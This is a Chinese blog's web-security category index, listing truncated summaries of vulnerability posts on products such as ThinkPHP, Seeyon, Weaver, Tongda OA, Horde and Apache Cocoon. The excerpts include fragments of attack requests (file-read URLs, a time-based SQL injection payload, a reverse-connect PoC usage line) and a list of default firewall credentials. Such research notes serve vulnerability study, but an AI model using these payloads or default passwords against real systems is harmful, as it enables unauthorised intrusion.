随笔分类 -  web安全

摘要:REQUEST: POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: Connection: close Content-Length: 85 Cache-Control: max-age=0 Sec-Ch-Ua: "Google C 阅读全文
posted @ 2021-04-09 16:03 r1ch4rd_L 阅读(267) 评论(0) 推荐(0)
摘要:Thinkphp 5.0.22http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.usernamehttp://192.168.1.1/thinkphp/public/?s=.|think\config/get 阅读全文
posted @ 2020-09-27 11:06 r1ch4rd_L 阅读(1752) 评论(0) 推荐(0)
摘要:2020年9月20日00:00左右,蜜罐设备告警发现攻击,溯源后,于全流量设备上捕捉到如下请求包 POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompr 阅读全文
posted @ 2020-09-20 10:01 r1ch4rd_L 阅读(2411) 评论(0) 推荐(0)
摘要:源代码分析: 问题出现在 ha_request.php 文件,第 37 行的 exec 函数,$url 为用户可控的变量,可见第 33 和 34 行。目光来到第 23 和 24 行,只要 node_request 函数的返回值为“OK”,即可跳过 fatal 函数(此函数为自定义函数,作用类似 PH 阅读全文
posted @ 2020-09-13 21:43 r1ch4rd_L 阅读(2827) 评论(0) 推荐(0)
摘要:天融信防火墙 用户名:superman 密码:talent 天融信防火墙 用户名:superman 密码:talent!23 联想网御防火墙 用户名:admin 密码:leadsec@7766、administrator、bane@7766 深信服防火墙 用户名:admin 密码:admin 启明星 阅读全文
posted @ 2020-09-13 21:37 r1ch4rd_L 阅读(6081) 评论(0) 推荐(0)
摘要:上一篇文章:泛微云桥任意文件读取漏洞 利用方式: 第一步: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt 第二步: /file/fileNoLogin/id 注: downloadUrl参数填写文件的绝对 阅读全文
posted @ 2020-09-13 21:35 r1ch4rd_L 阅读(1453) 评论(0) 推荐(0)
摘要:saturn:~ mr_me$ ./poc.py (+) usage ./poc.py <target> <path> <user:pass> <connectback:port> (+) eg: ./poc.py 172.16.175.148 /horde/ hordeuser:pass123 1 阅读全文
posted @ 2020-09-13 21:18 r1ch4rd_L 阅读(558) 评论(0) 推荐(0)
摘要:受影响版本: Apache Cocoon <= 2.1.x 程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。 以下是apache社区官方提供利用方式: <!--?xml ver 阅读全文
posted @ 2020-09-13 21:15 r1ch4rd_L 阅读(1758) 评论(0) 推荐(0)
摘要:GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */* GET /file/f 阅读全文
posted @ 2020-09-12 17:38 r1ch4rd_L 阅读(3228) 评论(0) 推荐(0)
摘要:POST /Proxy HTTP/1.1 Accept: Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host Co 阅读全文
posted @ 2020-09-11 17:27 r1ch4rd_L 阅读(2641) 评论(0) 推荐(0)
摘要:绿盟UTS综合威胁探针管理员任意登录 漏洞详情: 绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打 阅读全文
posted @ 2020-09-11 11:11 r1ch4rd_L 阅读(1995) 评论(0) 推荐(0)
摘要:漏洞原理: dev_linkage_launch.php 为设备联动的新入口点主要是将联动的接口构造成业务统一处理的接口 主要调用 跟进 可以看到 第一个检查为 $req_url = $_SERVER['PHP_SELF']; 绕过第一个检查: 在他们系统nginx配置文件里面: 通过nginx规则 阅读全文
posted @ 2020-09-11 10:58 r1ch4rd_L 阅读(3119) 评论(0) 推荐(0)
摘要:SQL注入 POC(11.5版本无需登录) 漏洞参数:SORT_ID,FILE_SORT 审计版本:通达OA 11.5 POST /general/file_folder/swfupload_new.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 1 阅读全文
posted @ 2020-08-25 10:14 r1ch4rd_L 阅读(638) 评论(0) 推荐(0)
摘要:注入点产生位置 注入payload 1593360000' AND if((1<0),SLEEP(0),sleep(2)) and '1 不产生延迟 产生延迟 阅读全文
posted @ 2020-08-25 10:13 r1ch4rd_L 阅读(196) 评论(0) 推荐(0)
摘要:验证码逻辑错误 文件:tool/log/l.php的第93行 阅读全文
posted @ 2020-08-24 17:40 r1ch4rd_L 阅读(328) 评论(0) 推荐(0)
摘要:任意文件读取 文件:store/cat.php第413行 read_file函数定义在该文件272行 阅读全文
posted @ 2020-08-24 17:39 r1ch4rd_L 阅读(1022) 评论(0) 推荐(0)
摘要:第一处代码执行 文件:tool/php_cli.php第64行 第二处代码执行 文件:tool/mdd_sql.php第133行 第三处代码执行 文件:tool/log/c.php 理论上四个变量都可导致代码执行 阅读全文
posted @ 2020-08-24 17:37 r1ch4rd_L 阅读(1234) 评论(0) 推荐(0)
摘要:这是我第一篇博客,写的不好请谅解 ____________________________(分割线)_______________________________ 在kali linux系统下自带工具中有个arp神器叫做“arpspoof”,废话不多说,直接上手 此次实验环境为靶机与FTP服务器之间 阅读全文
posted @ 2016-11-13 17:30 r1ch4rd_L 阅读(7220) 评论(1) 推荐(0)